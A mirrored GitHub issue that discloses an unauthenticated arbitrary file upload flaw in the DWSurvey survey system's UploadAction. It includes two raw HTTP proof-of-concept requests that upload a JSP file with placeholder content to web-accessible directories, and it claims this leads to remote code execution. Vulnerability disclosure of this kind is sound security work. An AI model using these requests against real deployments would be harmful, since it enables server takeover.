Giters

wkeyuan / DWSurvey

Survey System. 最好用的开源问卷调查系统、表单系统。

Home Page:http://www.diaowen.net

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Arbitrary file uploads exist

a02goblin opened this issue · comments

commented

``The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

image
`POST /diaowen/up/upload!saveimage.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde--
`
image
image

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

image
`POST /diaowen/up/upload!saveFile.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 489
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="basepath"

files
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde--
`
image
image

commented